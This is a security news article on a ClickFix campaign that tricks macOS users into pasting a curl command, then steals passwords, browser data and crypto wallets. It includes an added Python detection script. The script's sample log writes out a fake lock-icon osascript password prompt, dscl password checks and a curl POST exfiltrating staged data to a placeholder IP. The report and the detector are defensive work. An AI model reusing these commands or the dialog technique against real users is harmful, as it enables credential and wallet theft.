A sophisticated ClickFix campaign targets macOS users with AppleScript-based infostealers that harvest credentials, cryptocurrency wallets, and browser data through deceptive CAPTCHA prompts.
A new ClickFix campaign targeting macOS users delivers an AppleScript-based infostealer that collects credentials and live session cookies from 14 browsers, 16 cryptocurrency wallets, and more than 200 extensions. The attack represents a significant evolution in social engineering tactics that have traditionally focused on Windows systems.
How the Attack Works
The campaign begins when victims land on a fake CAPTCHA page while browsing. Client-side JavaScript on that page inspects the browser's user-agent: mobile devices are ignored, desktop visitors are checked further to determine the operating system, and when macOS-specific strings are found the page serves the AppleScript-based stealer built for Apple systems.
Once the fake CAPTCHA is displayed, users are told to open Spotlight on their Mac and paste a "verification code" into the search field. The "code" is actually a curl command that, when run, silently downloads a malicious script from an attacker-controlled server. That script records the victim's username, carries a hardcoded command-and-control (C2) server address, and creates a temporary directory at /tmp/xdivcmp/ in which it stages all stolen data before transmission.
The Credential Harvesting Phase
The malware is at its most deceptive during the credential-harvesting stage. It displays a dialog box that loads the genuine macOS lock icon from local system resources, so the prompt looks like a legitimate Apple password request, and the user types in their system password.
The dialog is built to force credential entry. It has a single action button and no way to dismiss it, and it keeps reappearing until the victim enters a valid password. Each submission is checked in real time against macOS Directory Services, the local account database behind the login password, so a wrong password simply brings the dialog back, in a loop, until the correct one is supplied.
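The behaviour described in the two sections above (a curl download into a /tmp staging directory, a repeated fake password dialog, a live password check against Directory Services, then a POST of the staged data) leaves a recognisable trail in process-execution telemetry. The script below is an added example of detection logic over such a trail; it is not Netskope's code or any vendor's rule. The log format (timestamp|pid|ppid|user|command line), the sample events and the exact osascript and dscl command shapes are constructed assumptions about how the described dialog and password check are typically implemented; only the /tmp/xdivcmp/ staging path comes from the published analysis.

```python
"""Flag ClickFix-style macOS infostealer chains in process-execution logs.

Added example with a constructed, simplified EDR export: one event per
line, fields "ts|pid|ppid|user|cmdline". The osascript/dscl shapes are
assumptions about the behaviour described, not extracted from a sample.
"""
import re
from collections import defaultdict

# Constructed sample log. alice is the victim; bob runs benign commands,
# including a lone dscl -authonly that should NOT be flagged on its own.
SAMPLE_LOG = """\
1712000001|4101|4000|alice|/usr/bin/curl -fsSL https://example.invalid/v/c.sh -o /tmp/xdivcmp/s.sh
1712000002|4102|4000|alice|/bin/bash /tmp/xdivcmp/s.sh
1712000003|4103|4102|alice|/usr/bin/osascript -e display dialog "macOS wants to make changes" default answer "" with hidden answer with icon POSIX file "/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/LockIcon.icns"
1712000004|4104|4102|alice|/usr/bin/dscl . -authonly alice hunter2
1712000006|4105|4102|alice|/usr/bin/osascript -e display dialog "macOS wants to make changes" default answer "" with hidden answer with icon POSIX file "/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/LockIcon.icns"
1712000007|4106|4102|alice|/usr/bin/dscl . -authonly alice Correct-Horse-1
1712000008|4107|4102|alice|/bin/cp -R /Users/alice/Library/Application Support/Exodus /tmp/xdivcmp/
1712000009|4108|4102|alice|/usr/bin/curl -s -X POST --data-binary @/tmp/xdivcmp/out.zip http://203.0.113.10/upload
1712000050|5200|5000|bob|/usr/bin/osascript -e display notification "Backup finished"
1712000060|5201|5000|bob|/usr/bin/dscl . -read /Users/bob RealName
1712000061|5202|5000|bob|/usr/bin/dscl . -authonly bob s3cret
"""

RULES = {
    # Staging directory named in the published analysis.
    "staging_dir": re.compile(r"/tmp/xdivcmp/"),
    # Fake system prompt: AppleScript dialog that hides typed input and
    # borrows the real lock icon (assumed shape of the described dialog).
    "password_dialog": re.compile(
        r"osascript.*display dialog.*hidden answer.*LockIcon\.icns", re.I),
    # Live password check against Directory Services (assumed dscl form).
    "authonly": re.compile(r"\bdscl\b.*-authonly"),
    # Exfiltration: HTTP POST of something staged under /tmp.
    "exfil_post": re.compile(r"curl.*(-X POST|--data-binary|-F ).*@?/tmp/"),
}


def parse(log_text):
    """Turn the pipe-delimited sample into event dicts."""
    events = []
    for line in log_text.strip().splitlines():
        ts, pid, ppid, user, cmd = line.split("|", 4)
        events.append({"ts": int(ts), "pid": int(pid), "ppid": int(ppid),
                       "user": user, "cmd": cmd})
    return events


def tag(event):
    """Names of every rule the command line matches."""
    return {name for name, rx in RULES.items() if rx.search(event["cmd"])}


def root_of(pid, parent):
    """Climb the parent chain until the first ancestor that was not logged
    (the Terminal or login shell, say); that pid keys the whole tree."""
    seen = set()
    while pid in parent and pid not in seen:
        seen.add(pid)
        pid = parent[pid]
    return pid


def find_clickfix_chains(events, window=300):
    """A process tree is flagged only when the fake dialog AND an auth
    check both appear within `window` seconds; a lone dscl -authonly or a
    lone /tmp write is not enough. password_attempts counts how many times
    the victim was prompted, i.e. how many tries the loop needed."""
    parent = {ev["pid"]: ev["ppid"] for ev in events}
    trees = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        tags = tag(ev)
        if tags:
            trees[(ev["user"], root_of(ev["pid"], parent))].append((ev, tags))
    findings = []
    for (user, root), tagged in trees.items():
        hit = set().union(*(t for _, t in tagged))
        span = tagged[-1][0]["ts"] - tagged[0][0]["ts"]
        if {"password_dialog", "authonly"} <= hit and span <= window:
            findings.append({
                "user": user,
                "root_pid": root,
                "indicators": sorted(hit),
                "password_attempts": sum("authonly" in t for _, t in tagged),
                "exfil": "exfil_post" in hit,
            })
    return findings


if __name__ == "__main__":
    for finding in find_clickfix_chains(parse(SAMPLE_LOG)):
        print(finding)
```

On the sample, only alice's tree is reported, with two password attempts (the first dscl check failed, so the dialog came back) and an exfiltration POST; bob's single dscl -authonly never reaches the threshold. The same grouping-by-unlogged-ancestor trick is what makes the rule useful in practice: the curl, the bash, the osascript dialogs and the dscl checks are siblings or children under one Terminal process, so they are scored together rather than as unrelated one-off events.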
Data Theft Scope
Once credentials are obtained, the stealer goes after extensive user data:
Browser Data:
- 12 Chromium-based browsers: Chrome, Brave, Edge, Vivaldi, Opera, Opera GX, Chrome Beta, Chrome Canary, Chromium, Chrome Dev, Arc, and CocCoc
- Firefox and Waterfox (Firefox-based browser)
- Session tokens, authentication cookies, saved passwords, and autofill information including credit card numbers
- Data from more than 200 browser extensions
Cryptocurrency Wallets:
- 16 standalone desktop applications: Exodus, Atomic, Electrum, Coinomi, Guarda, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, Dash Core, Dogecoin Core, Monero, Wasabi, Sparrow, Electron Cash, and Electrum-LTC
- Browser extension wallets including MetaMask, Phantom, Coinbase Wallet, Trust Wallet, and dozens of blockchain-specific extensions
Other Targeted Data:
- macOS Keychain (stores saved passwords, Wi-Fi credentials, secure notes, and cryptographic keys)
- Password manager credentials from LastPass, 1Password, Dashlane, Bitwarden
- Two-factor authentication extensions such as Authy and Google Authenticator
- Various VPN and single sign-on extensions used for corporate access
Geographic and Sector Targeting
According to Netskope Threat Labs researcher Jan Michael Alcantara, victims are primarily located in Asia and work in the finance sector. The researchers don't know who is behind this particular campaign, though they note it can infect both Windows and macOS machines: client-side JavaScript on the lure page filters victims by user-agent, ignoring mobile devices and directing desktop users to either a Windows or a macOS-specific payload.
Protection Measures
Apple did not respond to inquiries about this campaign, but the latest versions of macOS Tahoe (26.4) and macOS Sequoia include a new feature designed to blunt ClickFix attacks: it warns users when they paste a potentially malicious command into the Terminal application. Updating to these versions helps detect and prevent this type of attack.
However, if users are running older OS versions, or ignore the macOS warning and click "paste anyway", the attack proceeds unhindered. This highlights the importance of both keeping systems updated and staying alert to social engineering.
Technical Analysis and Indicators
Netskope has published a full list of indicators of compromise and scripts related to this malware in its GitHub repository. The campaign serves as a reminder that social engineering remains a primary threat to both Windows and macOS users, despite advances in technical security measures.
This infostealer campaign is unrelated to another macOS-targeting campaign that Microsoft last week attributed to North Korean criminals, despite overlapping techniques, such as continuing to rely on social engineering even after the malware is already running on the machine.
The attack demonstrates how cybercriminals continue to evolve their tactics, combining scripting with psychological manipulation to bypass security controls and harvest valuable credentials and cryptocurrency assets from unsuspecting users.